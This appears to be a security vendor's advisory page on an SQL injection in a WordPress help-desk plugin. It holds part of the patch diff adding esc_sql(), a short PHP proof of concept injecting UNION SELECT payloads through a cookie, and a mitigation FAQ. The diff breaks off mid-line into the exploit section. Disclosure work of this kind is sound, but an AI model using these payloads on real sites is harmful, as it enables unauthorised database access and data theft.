+ $query = "SELECT status FROM `" . jssupportticket::$_db->prefix . "js_ticket_departments` WHERE id=" . esc_sql($id);
$status = jssupportticket::$_db->get_var($query);
$status = 1 - $status;
@@ -262,10 +262,10 @@
if (!is_numeric($id))
return false;
- $query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_departments` SET isdefault = 0 WHERE id != " . $id;
+ $query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_departments` SET isdefault = 0 WHERE id != " . esc_sql($id);
jssupportticket::$_db->query($query);
- $query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_departments` SET isdefault = 1 - $default WHERE id=" . $id;
+ $query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_departments` SET isdefault = 1 - $default WHERE id=" . esc_sql($id);
jssupportticket::$_db->query($query);
if (jssupportticket::$_db->last_error == null) {
@@ -291,7 +291,7 @@
return false;
}
- $query = "SELECT id, topic AS text FROM `" . jssupportticket::$_db->prefix . "js_ticket_help_topics` WHERE status = 1 AND departmentid = " . $departmentid . " ORDER BY ordering ASC";
+ $query = "SELECT id, topic AS text FROM `" . jssupportticket::$_db->prefix . "js_ticket_help_topics` WHERE status = 1 AND departmentid = " . esc_sql($departmentid) . " ORDER BY ordering ASC";
$list = jssupportticket::$_db->get_results($query);
$query = "SELECT required FROM `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` WHERE field='helptopic'";
@@ -315,7 +315,7 @@
$departmentid = JSSTrequest::getVar('val');
if (!is_numeric($departmentid))
return false;
- $query = "SELECT id, title AS text FROM `" . jssupportticket::$_db->prefix . "js_ticket_department_message_premade` WHERE status = 1 AND departmentid = " . $departmentid;
+ $query = "SELECT id, title AS text FROM `" . jssupportticket::$_db->prefix . "js_ticket_department_message_premade` WHERE status = 1 AND departmentid = " . esc_sql($departmentid);
$list = jssupportticket::$_db->get_results($query);
$combobox = false;
$html = '';
@@ -344,7 +344,7 @@
function getSignatureByID($id) {
if (!is_numeric($id))
return false;
- $query = "SELECT departmentsignature FROM `" . jssupportticket::$_db->prefix . "js_ticket_departments` WHERE id = " . $id;
+ $query = "SELECT departmentsignature FROM `" . jssupportticket::$_db->prefix . "js_ticket_departments` WHERE id = " . esc_sql($id);
$signature = jssupportticket::$_db->get_var($query);
return $signature;
}
@@ -352,7 +352,7 @@
function getDepartmentById($id) {
if (!is_numeric($id))
return false;
- $query = "SELECT departmentname FROM `" . jssupportticket::$_db->prefix . "js_ticket_departments` WHERE id = " . $id;
+ $query = "SELECT departmentname FROM `" . jssupportticket::$_db->prefix . "js_ticket_departments` WHERE id = " . esc_sql($id);
$departmentname = jssupportticket::$_db->get_var($query);
return $departmentname;
}
--- a/js-support-ticket/modules/email/model.php
+++ b/js-support-ticket/modules/email/model.php
@@ -110,7 +110,7 @@
FROM `".jssupportticket::$_db->prefix."js_ticket_tickets` AS ticket
LEFT JOIN `".jssupportticket::$_db->prefix."js_ticket_departments` AS dept ON dept.id = ticket.departmentid
LEFT JOIN `".jssupportticket::$_db->prefix."js_ticket_email` AS email ON email.id = dept.emailid
- WHERE ticket.id = ".$id;
+ WHERE ticket.id = ".esc_sql($id);
$dept_result = jssupportticket::$_db->get_row($query);
if($dept_result){
if(isset($dept_result->sendmail) && $dept_result->sendmail == 1){
@@ -1879,19 +1879,19 @@
$query = "SELECT mail.subject,mail.message,CONCAT(staff.firstname,' ',staff.lastname) AS sendername, staff.uid as staffuid
FROM `" . jssupportticket::$_db->prefix . "js_ticket_staff_mail` AS mail
JOIN `" . jssupportticket::$_db->prefix . "js_ticket_staff` AS staff ON staff.id = mail.fromid
- WHERE mail.id = " . $id;
+ WHERE mail.id = " . esc_sql($id);
} else {
$query = "SELECT mail.subject,reply.message,CONCAT(staff.firstname,' ',staff.lastname) AS sendername, staff.uid as staffuid
FROM `" . jssupportticket::$_db->prefix . "js_ticket_staff_mail` AS reply
JOIN `" . jssupportticket::$_db->prefix . "js_ticket_staff_mail` AS mail ON mail.id = reply.replytoid
JOIN `" . jssupportticket::$_db->prefix . "js_ticket_staff` AS staff ON staff.id = reply.fromid
- WHERE reply.id = " . $id;
+ WHERE reply.id = " . esc_sql($id);
}
$result = jssupportticket::$_db->get_row($query);
$query = "SELECT staff.email
FROM `" . jssupportticket::$_db->prefix . "js_ticket_staff_mail` AS mail
JOIN `" . jssupportticket::$_db->prefix . "js_ticket_staff` AS staff ON staff.id = mail.toid
- WHERE mail.id = " . $id;
+ WHERE mail.id = " . esc_sql($id);
$email = jssupportticket::$_db->get_var($query);
$result->receveremail = $email;
return $result;
@@ -1902,7 +1902,7 @@
return false;
$query = "SELECT staff.email
FROM `" . jssupportticket::$_db->prefix . "js_ticket_staff` AS staff
- WHERE staff.id = $id";
+ WHERE staff.id = " . esc_sql($id);
$emailaddress = jssupportticket::$_db->get_var($query);
return $emailaddress;
}
@@ -1912,7 +1912,7 @@
return false;
$query = "SELECT staff.uid
FROM `" . jssupportticket::$_db->prefix . "js_ticket_staff` AS staff
- WHERE staff.id = $id";
+ WHERE staff.id = " . esc_sql($id);
$emailaddress = jssupportticket::$_db->get_var($query);
return $emailaddress;
}
@@ -1920,7 +1920,7 @@
private function getLatestReplyByTicketId($id) {
if (!is_numeric($id))
return false;
- $query = "SELECT reply.message FROM `" . jssupportticket::$_db->prefix . "js_ticket_replies` AS reply WHERE reply.ticketid = " . $id . " ORDER BY reply.created DESC LIMIT 1";
+ $query = "SELECT reply.message FROM `" . jssupportticket::$_db->prefix . "js_ticket_replies` AS reply WHERE reply.ticketid = " . esc_sql($id) . " ORDER BY reply.created DESC LIMIT 1";
$message = jssupportticket::$_db->get_var($query);
if (jssupportticket::$_db->last_error != null) {
JSSTincluder::getJSModel('systemerror')->addSystemError();
@@ -2012,7 +2012,7 @@
FROM `" . jssupportticket::$_db->prefix . "js_ticket_tickets` AS ticket
JOIN `" . jssupportticket::$_db->prefix . "js_ticket_departments` AS department ON department.id = ticket.departmentid
JOIN `" . jssupportticket::$_db->prefix . "js_ticket_email` AS email ON email.id = department.emailid
- WHERE ticket.id = " . $id;
+ WHERE ticket.id = " . esc_sql($id);
$email = jssupportticket::$_db->get_row($query);
if (jssupportticket::$_db->last_error != null) {
JSSTincluder::getJSModel('systemerror')->addSystemError();
@@ -2028,13 +2028,13 @@
private function getDefaultSenderEmailAndName() {
$emailid = jssupportticket::$_config['default_alert_email'];
- $query = "SELECT email,name FROM `" . jssupportticket::$_db->prefix . "js_ticket_email` WHERE id = " . $emailid;
+ $query = "SELECT email,name FROM `" . jssupportticket::$_db->prefix . "js_ticket_email` WHERE id = " . esc_sql($emailid);
$email = jssupportticket::$_db->get_row($query);
return $email;
}
private function getTemplateForEmail($templatefor) {
- $query = "SELECT * FROM `" . jssupportticket::$_db->prefix . "js_ticket_emailtemplates` WHERE templatefor = '" . $templatefor . "'";
+ $query = "SELECT * FROM `" . jssupportticket::$_db->prefix . "js_ticket_emailtemplates` WHERE templatefor = '" . esc_sql($templatefor) . "'";
$template = jssupportticket::$_db->get_row($query);
if (jssupportticket::$_db->last_error != null) {
JSSTincluder::getJSModel('systemerror')->addSystemError();
@@ -2053,11 +2053,11 @@
. " LEFT JOIN `" . jssupportticket::$_db->prefix . "js_ticket_departments` AS department ON department.id = ticket.departmentid "
. jssupportticket::$_addon_query['join']
. " LEFT JOIN `" . jssupportticket::$_db->prefix . "js_ticket_priorities` AS priority ON priority.id = ticket.priorityid "
- . " WHERE ticket.id = " . $id;
+ . " WHERE ticket.id = " . esc_sql($id);
do_action('reset_jsst_aadon_query');
break;
default:
- $query = "SELECT * FROM `" . jssupportticket::$_db->prefix . $tablename . "` WHERE id = " . $id;
+ $query = "SELECT * FROM `" . jssupportticket::$_db->prefix . $tablename . "` WHERE id = " . esc_sql($id);
break;
}
$record = jssupportticket::$_db->get_row($query);
@@ -2072,7 +2072,7 @@
$email = jssupportticket::$_search['email']['email'];
$inquery = '';
if ($email != null)
- $inquery .= " WHERE email.email LIKE '%$email%'";
+ $inquery .= " WHERE email.email LIKE '%".esc_sql($email)."%'";
jssupportticket::$_data['filter']['email'] = $email;
@@ -2111,7 +2111,7 @@
return false;
$query = "SELECT email.id, email.email, email.autoresponse, email.created, email.updated,email.status,email.smtpemailauth,email.smtphosttype,email.smtphost,email.smtpauthencation,email.name,email.password,email.smtpsecure,email.mailport
FROM `" . jssupportticket::$_db->prefix . "js_ticket_email` AS email
- WHERE email.id = " . $id;
+ WHERE email.id = " . esc_sql($id);
jssupportticket::$_data[0] = jssupportticket::$_db->get_row($query);
if(isset(jssupportticket::$_data[0]->password) && jssupportticket::$_data[0]->password != ''){
jssupportticket::$_data[0]->password = jssupportticketphplib::JSST_safe_decoding(jssupportticket::$_data[0]->password);
@@ -2162,7 +2162,7 @@
}
function checkAlreadyExist($email){
- $query = "SELECT COUNT(id) FROM`" . jssupportticket::$_db->prefix . "js_ticket_email` WHERE email = '".$email."'";
+ $query = "SELECT COUNT(id) FROM`" . jssupportticket::$_db->prefix . "js_ticket_email` WHERE email = '".esc_sql($email)."'";
$result = jssupportticket::$_db->get_var($query);
if($result > 0)
return true;
@@ -2191,9 +2191,9 @@
if (!is_numeric($id))
return false;
$query = "SELECT (
- (SELECT COUNT(id) FROM `" . jssupportticket::$_db->prefix . "js_ticket_departments` WHERE emailid = " . $id . ")
- + (SELECT COUNT(*) FROM `" . jssupportticket::$_db->prefix . "js_ticket_config` WHERE configname = 'default_alert_email' AND configvalue = " . $id . ")
- + (SELECT COUNT(*) FROM `" . jssupportticket::$_db->prefix . "js_ticket_config` WHERE configname = 'default_admin_email' AND configvalue = " . $id . ")
+ (SELECT COUNT(id) FROM `" . jssupportticket::$_db->prefix . "js_ticket_departments` WHERE emailid = " . esc_sql($id) . ")
+ + (SELECT COUNT(*) FROM `" . jssupportticket::$_db->prefix . "js_ticket_config` WHERE configname = 'default_alert_email' AND configvalue = " . esc_sql($id) . ")
+ + (SELECT COUNT(*) FROM `" . jssupportticket::$_db->prefix . "js_ticket_config` WHERE configname = 'default_admin_email' AND configvalue = " . esc_sql($id) . ")
) AS total";
$result = jssupportticket::$_db->get_var($query);
if (jssupportticket::$_db->last_error != null) {
@@ -2217,7 +2217,7 @@
function getEmailById($id) {
if (!is_numeric($id))
return false;
- $query = "SELECT email FROM `" . jssupportticket::$_db->prefix . "js_ticket_email` WHERE id = " . $id;
+ $query = "SELECT email FROM `" . jssupportticket::$_db->prefix . "js_ticket_email` WHERE id = " . esc_sql($id);
$email = jssupportticket::$_db->get_var($query);
if (jssupportticket::$_db->last_error != null) {
JSSTincluder::getJSModel('systemerror')->addSystemError();
@@ -2231,7 +2231,7 @@
}
if(!is_string($senderemail))
return false;
- $query = "SELECT COUNT(id) FROM `" . jssupportticket::$_db->prefix . "js_ticket_email` WHERE email = '".$senderemail. "' AND smtpemailauth = 1"; // 1 For smtp 0 for default
+ $query = "SELECT COUNT(id) FROM `" . jssupportticket::$_db->prefix . "js_ticket_email` WHERE email = '".esc_sql($senderemail). "' AND smtpemailauth = 1"; // 1 For smtp 0 for default
$total = jssupportticket::$_db->get_var($query);
if($total > 0){
return true;
@@ -2241,7 +2241,7 @@
}
function getSMTPEmailConfig($senderemail){
- $query = "SELECT * FROM `" . jssupportticket::$_db->prefix . "js_ticket_email` WHERE email = '".$senderemail."'";
+ $query = "SELECT * FROM `" . jssupportticket::$_db->prefix . "js_ticket_email` WHERE email = '".esc_sql($senderemail)."'";
$emailconfig = jssupportticket::$_db->get_row($query);
return $emailconfig;
}
@@ -2316,7 +2316,7 @@
$query = "SELECT replies.*,replies.id AS replyid,tickets.id
FROM `" . jssupportticket::$_db->prefix . "js_ticket_replies` AS replies
JOIN `" . jssupportticket::$_db->prefix . "js_ticket_tickets` AS tickets ON replies.ticketid = tickets.id
- WHERE tickets.id = " . $id . " ORDER By replies.id DESC";
+ WHERE tickets.id = " . esc_sql($id) . " ORDER By replies.id DESC";
$replies = jssupportticket::$_db->get_results($query);
foreach ($replies as $key => $reply) {
if ($key == 0) {
--- a/js-support-ticket/modules/emailtemplate/model.php
+++ b/js-support-ticket/modules/emailtemplate/model.php
@@ -64,7 +64,7 @@
default: $tempatefor = 'ticket-new';
break;
}
- $query = "SELECT * FROM `" . jssupportticket::$_db->prefix . "js_ticket_emailtemplates` WHERE templatefor = '" . $tempatefor . "'";
+ $query = "SELECT * FROM `" . jssupportticket::$_db->prefix . "js_ticket_emailtemplates` WHERE templatefor = '" . esc_sql($tempatefor) . "'";
jssupportticket::$_data[0] = jssupportticket::$_db->get_row(($query));
if (jssupportticket::$_db->last_error != null) {
JSSTincluder::getJSModel('systemerror')->addSystemError();
@@ -102,7 +102,7 @@
die( 'Security check Failed' );
}
$templatefor = JSSTrequest::getVar('templatefor');
- $query = "SELECT * FROM `" . jssupportticket::$_db->prefix . "js_ticket_emailtemplates` WHERE templatefor = '" . $templatefor . "'";
+ $query = "SELECT * FROM `" . jssupportticket::$_db->prefix . "js_ticket_emailtemplates` WHERE templatefor = '" . esc_sql($templatefor) . "'";
$result = jssupportticket::$_db->get_row($query);
$data = array('defaultsubject'=>htmlentities($result->subject),'defaultbody'=>htmlentities($result->body) , 'defaultid'=>htmlentities($result->id));
return json_encode($data);
--- a/js-support-ticket/modules/fieldordering/model.php
+++ b/js-support-ticket/modules/fieldordering/model.php
@@ -11,7 +11,7 @@
}
$formid = jssupportticket::$_data['formid'];
if (isset($formid) && $formid != null) {
- $inquery = " AND multiformid = ".$formid;
+ $inquery = " AND multiformid = ".esc_sql($formid);
}
else{
$inquery = " AND multiformid = ".JSSTincluder::getJSModel('ticket')->getDefaultMultiFormId();
@@ -26,7 +26,7 @@
// Data
// $query = "SELECT * FROM `".jssupportticket::$_db->prefix."js_ticket_fieldsordering` WHERE published = 1 AND fieldfor = 1 ORDER BY ordering LIMIT ".JSSTpagination::getOffset().", ".JSSTpagination::getLimit();
- $query = "SELECT * FROM `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` WHERE fieldfor = ".$fieldfor;
+ $query = "SELECT * FROM `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` WHERE fieldfor = ".esc_sql($fieldfor);
$query .= $inquery." ORDER BY ordering ";
jssupportticket::$_data[0] = jssupportticket::$_db->get_results($query);
@@ -40,14 +40,14 @@
if (!is_numeric($id))
return false;
if ($status == 'publish') {
- $query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET published = 1 WHERE id = " . $id . " AND cannotunpublish = 0";
+ $query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET published = 1 WHERE id = " . esc_sql($id) . " AND cannotunpublish = 0";
jssupportticket::$_db->query($query);
if (jssupportticket::$_db->last_error != null) {
JSSTincluder::getJSModel('systemerror')->addSystemError();
}
JSSTmessage::setMessage(esc_html(__('Field mark as published', 'js-support-ticket')),'updated');
} elseif ($status == 'unpublish') {
- $query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET published = 0 WHERE id = " . $id . " AND cannotunpublish = 0";
+ $query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET published = 0 WHERE id = " . esc_sql($id) . " AND cannotunpublish = 0";
jssupportticket::$_db->query($query);
if (jssupportticket::$_db->last_error != null) {
JSSTincluder::getJSModel('systemerror')->addSystemError();
@@ -61,12 +61,12 @@
if (!is_numeric($id))
return false;
if ($status == 'publish') {
- $query = "SELECT userfieldtype FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE id = " . $id;
+ $query = "SELECT userfieldtype FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE id = " . esc_sql($id);
$userfieldtype = jssupportticket::$_db->get_var($query);
if($userfieldtype == 'admin_only'){
JSSTmessage::setMessage(esc_html(__('Field cannot be mark as published', 'js-support-ticket')),'error');
}else{
- $query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET isvisitorpublished = 1 WHERE id = " . $id . " AND cannotunpublish = 0";
+ $query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET isvisitorpublished = 1 WHERE id = " . esc_sql($id) . " AND cannotunpublish = 0";
jssupportticket::$_db->query($query);
if (jssupportticket::$_db->last_error != null) {
JSSTincluder::getJSModel('systemerror')->addSystemError();
@@ -74,7 +74,7 @@
JSSTmessage::setMessage(esc_html(__('Field mark as published', 'js-support-ticket')),'updated');
}
} elseif ($status == 'unpublish') {
- $query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET isvisitorpublished = 0 WHERE id = " . $id . " AND cannotunpublish = 0";
+ $query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET isvisitorpublished = 0 WHERE id = " . esc_sql($id) . " AND cannotunpublish = 0";
jssupportticket::$_db->query($query);
if (jssupportticket::$_db->last_error != null) {
JSSTincluder::getJSModel('systemerror')->addSystemError();
@@ -88,23 +88,23 @@
if (!is_numeric($id))
return false;
- // $query = "SELECT field FROM `".jssupportticket::$_db->prefix."js_ticket_fieldsordering` WHERE id =".$id;
+ // $query = "SELECT field FROM `".jssupportticket::$_db->prefix."js_ticket_fieldsordering` WHERE id =".esc_sql($id);
// $child = jssupportticket::$_db->get_var($query);
- // $query = "SELECT count(id) FROM `".jssupportticket::$_db->prefix."js_ticket_fieldsordering` WHERE visible_field = '".$child."'";
+ // $query = "SELECT count(id) FROM `".jssupportticket::$_db->prefix."js_ticket_fieldsordering` WHERE visible_field = '".esc_sql($child)."'";
// $count = jssupportticket::$_db->get_var($query);
// if ($count > 0) {
// JSSTmessage::setMessage(esc_html(__('Field cannot mark as required', 'js-support-ticket')), 'error');
// return;
// }
if ($status == 'required') {
- $query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET required = 1 WHERE id = " . $id . " AND cannotunpublish = 0";
+ $query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET required = 1 WHERE id = " . esc_sql($id) . " AND cannotunpublish = 0";
jssupportticket::$_db->query($query);
if (jssupportticket::$_db->last_error != null) {
JSSTincluder::getJSModel('systemerror')->addSystemError();
}
JSSTmessage::setMessage(esc_html(__('Field mark as required', 'js-support-ticket')),'updated');
} elseif ($status == 'unrequired') {
- $query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET required = 0 WHERE id = " . $id . " AND cannotunpublish = 0";
+ $query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET required = 0 WHERE id = " . esc_sql($id) . " AND cannotunpublish = 0";
jssupportticket::$_db->query($query);
if (jssupportticket::$_db->last_error != null) {
JSSTincluder::getJSModel('systemerror')->addSystemError();
@@ -120,16 +120,16 @@
if ($action == 'down') {
$query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` AS f1, `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` AS f2
SET f1.ordering = f1.ordering - 1 WHERE f1.ordering = f2.ordering + 1 AND f1.fieldfor = f2.fieldfor
- AND f2.id = " . $id;
+ AND f2.id = " . esc_sql($id);
jssupportticket::$_db->query($query);
- $query = " UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET ordering = ordering + 1 WHERE id = " . $id;
+ $query = " UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET ordering = ordering + 1 WHERE id = " . esc_sql($id);
jssupportticket::$_db->query($query);
JSSTmessage::setMessage(esc_html(__('Field ordering down', 'js-support-ticket')),'updated');
} elseif ($action == 'up') {
$query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` AS f1, `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` AS f2 SET f1.ordering = f1.ordering + 1
- WHERE f1.ordering = f2.ordering - 1 AND f1.fieldfor = f2.fieldfor AND f2.id = " . $id;
+ WHERE f1.ordering = f2.ordering - 1 AND f1.fieldfor = f2.fieldfor AND f2.id = " . esc_sql($id);
jssupportticket::$_db->query($query);
- $query = " UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET ordering = ordering - 1 WHERE id = " . $id;
+ $query = " UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET ordering = ordering - 1 WHERE id = " . esc_sql($id);
jssupportticket::$_db->query($query);
JSSTmessage::setMessage(esc_html(__('Field ordering up', 'js-support-ticket')),'updated');
}
@@ -147,7 +147,7 @@
if(!isset($formid) || $formid==''){
$formid = JSSTincluder::getJSModel('ticket')->getDefaultMultiFormId();
}
- $query = "SELECT * FROM `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` WHERE ".$published." AND fieldfor = " . $fieldfor ." AND multiformid = " . $formid . " ORDER BY ordering ";
+ $query = "SELECT * FROM `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` WHERE ".$published." AND fieldfor = " . esc_sql($fieldfor) ." AND multiformid = " . esc_sql($formid) . " ORDER BY ordering ";
jssupportticket::$_data['fieldordering'] = jssupportticket::$_db->get_results($query);
return;
}
@@ -160,7 +160,7 @@
if ($data['isuserfield'] == 1) {
// value to add as field ordering
if ($data['id'] == '') { // only for new
- $query = "SELProof of Concept (PHP)
NOTICE :
This proof-of-concept is provided for educational and authorized security research purposes only.
You may not use this code against any system, application, or network without explicit prior authorization from the system owner.
Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.
This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.
By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.
PHP PoC
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2023-7337 - JS Help Desk – AI-Powered Support & Ticketing System 2.8.2 - Unauthenticated SQL Injection via 'js-support-ticket-token-tkstatus' Cookie
<?php
$target_url = "http://target-wordpress-site.com";
// Craft SQL injection payload to extract database version
// The payload abuses the session ID parameter in the wphdnotification.php query
$malicious_session_id = "' UNION SELECT version()-- ";
// Set up cURL request with malicious cookie
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
// The plugin reads the 'js-support-ticket-token-tkstatus' cookie for session handling
$cookie_header = "js-support-ticket-token-tkstatus=" . urlencode($malicious_session_id);
curl_setopt($ch, CURLOPT_COOKIE, $cookie_header);
// Execute request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
// The injection occurs when the plugin processes session data
// The vulnerable query in wphdnotification.php line 81 becomes:
// SELECT sessionmsg FROM js_ticket_jshdsessiondata WHERE usersessionid = '' UNION SELECT version()-- ' AND sessionfor = '...'
// This returns the database version instead of session messages
echo "HTTP Response Code: " . $http_code . "n";
echo "Check database logs or application responses for SQL injection resultsn";
// Alternative payload for data extraction:
// ' UNION SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=database()--
// This would list all tables in the current database
?>Frequently Asked Questions
What is CVE-2023-7337?
Overview of the vulnerabilityCVE-2023-7337 is a high-severity SQL injection vulnerability in the JS Help Desk – AI-Powered Support & Ticketing System plugin for WordPress, specifically in version 2.8.2. It allows unauthenticated attackers to exploit an insufficiently sanitized cookie to execute arbitrary SQL commands.
How does the SQL injection work?
Mechanism of the attackThe vulnerability arises from the ‘js-support-ticket-token-tkstatus’ cookie, which is used in SQL queries without adequate escaping. Attackers can manipulate this cookie to inject malicious SQL payloads, potentially extracting sensitive information from the database.
Who is affected by this vulnerability?
Identifying vulnerable usersAny WordPress site using the JS Help Desk plugin version 2.8.2 is at risk. Administrators should check their plugin version and update if they are on the vulnerable version.
How can I check if my site is vulnerable?
Steps for verificationTo determine if your site is vulnerable, check the version of the JS Help Desk plugin installed. If it is version 2.8.2, your site is at risk. Additionally, review your site’s logs for any suspicious SQL queries.
What should I do to fix this vulnerability?
Mitigation stepsThe recommended fix is to update the JS Help Desk plugin to version 2.8.3 or later, where the vulnerability has been patched. Regularly updating all plugins and themes is essential for maintaining site security.
What does the CVSS score of 7.5 indicate?
Understanding risk levelsA CVSS score of 7.5 indicates a high severity level, meaning the vulnerability can be exploited easily and could lead to significant damage, such as data breaches or unauthorized access to sensitive information.
What are the practical risks associated with this vulnerability?
Potential consequencesIf exploited, this vulnerability can allow attackers to execute arbitrary SQL commands, which may lead to the extraction of sensitive data such as user credentials, ticket contents, and configuration settings, compromising the integrity of the site.
How does the proof of concept demonstrate the vulnerability?
Example of exploitationThe proof of concept provided shows how an attacker can craft a malicious session ID to execute SQL queries against the vulnerable site. By sending a specially crafted cookie, the attacker can retrieve the database version, demonstrating the potential for further exploitation.
What measures can I take to further secure my WordPress site?
Additional security practicesIn addition to updating vulnerable plugins, consider implementing security plugins that monitor for SQL injection attempts, regularly back up your database, and employ web application firewalls to filter malicious traffic.
Is this vulnerability related to any previous vulnerabilities?
Connection to CVE-2023-50839Yes, CVE-2023-7337 is related to a previous vulnerability, CVE-2023-50839, where an incomplete fix allowed a second SQL injection sink to remain vulnerable. This highlights the importance of thorough testing after applying security patches.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategiesIf an immediate update is not possible, consider disabling the JS Help Desk plugin temporarily to prevent exploitation. Additionally, review your site’s security settings and monitor for any unusual activity until the plugin can be updated.
Where can I find more information about this vulnerability?
Resources for further readingMore detailed information can be found in the official CVE database, security advisory from the plugin developer, and security-focused websites that track vulnerabilities and provide updates on patches.
How Atomic Edge Works
Simple Setup. Powerful Security.
Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.
Trusted by Developers & Organizations
